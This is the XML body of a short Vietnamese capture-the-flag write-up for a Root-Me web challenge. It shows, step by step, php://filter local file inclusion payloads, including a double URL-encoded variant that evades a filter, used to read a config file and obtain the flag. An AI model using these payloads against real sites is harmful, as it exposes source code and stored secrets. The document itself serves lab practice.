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102E" w14:textId="677C4407" w:rsidR="007662CA" w:rsidRDefault="007662CA">
      <w:r>
        <w:t>Vào trang ta thấy trang không filter ta thực hiện truyền payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C80D430" w14:textId="1A43C220" w:rsidR="00C54FA4" w:rsidRDefault="00BD023B">
      <w:r w:rsidRPr="00BD023B">
        <w:t>http://challenge01.root-me.org/web-serveur/ch45/index.php?page=php://filter/convert.base64-encode/resource=cv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF74A9" w14:textId="7DA7A083" w:rsidR="00BD023B" w:rsidRDefault="00BD023B">
      <w:r>
        <w:t>chuyển thành hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C5B32F" w14:textId="254AAC38" w:rsidR="00BD023B" w:rsidRDefault="00BD023B">
      <w:r w:rsidRPr="00BD023B">
        <w:t>http://challenge01.root-me.org/web-serveur/ch45/index.php?page=php%253A%252F%252Ffilter%252Fconvert%252Ebase64%252Dencode%252Fresource%253Dcv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD947F" w14:textId="3E78008C" w:rsidR="007662CA" w:rsidRDefault="007662CA">
      <w:r>
        <w:t xml:space="preserve">Có được chuỗi và decode, thấy được nơi để flag </w:t>
      </w:r>
      <w:r w:rsidRPr="007662CA">
        <w:t>conf.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686000D" w14:textId="24E2FC83" w:rsidR="00BD023B" w:rsidRDefault="007662CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71D00335" wp14:editId="6CABEA2D">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="114357181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71815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E6C3" w14:textId="54510CC2" w:rsidR="007662CA" w:rsidRDefault="007662CA">
      <w:r>
        <w:t>Tiếp tục tạo payload và vào thì ta có flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D616E6F" w14:textId="4F8A4472" w:rsidR="007662CA" w:rsidRDefault="007662CA">
      <w:r w:rsidRPr="00BD023B">
        <w:t>http://challenge01.root-me.org/web-serveur/ch45/index.php?page=php://filter/convert.base64-encode/resource=</w:t>
      </w:r>
      <w:r>
        <w:t>conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E447E2B" w14:textId="0670B670" w:rsidR="007662CA" w:rsidRDefault="007662CA">
      <w:r w:rsidRPr="007662CA">
        <w:t>http://challenge01.root-me.org/web-serveur/ch45/index.php?page=php%253A%252F%252Ffilter%252Fconvert%252Ebase64%252Dencode%252Fresource%253Dconf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D13A52E" w14:textId="22FA0167" w:rsidR="007662CA" w:rsidRDefault="007662CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="435D6945" wp14:editId="21144DD1">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="94498444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4443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81EA" w14:textId="754CF86A" w:rsidR="007662CA" w:rsidRDefault="007662CA">
      <w:r w:rsidRPr="007662CA">
        <w:t>Th1sIsTh3Fl4g!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0076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79"/>
    <w:rsid w:val="00586979"/>
    <w:rsid w:val="007662CA"/>
    <w:rsid w:val="00BD023B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F7BA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{94F786BC-52CA-40E9-B74F-3B0F957C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2023-04-14T17:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-14T17:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>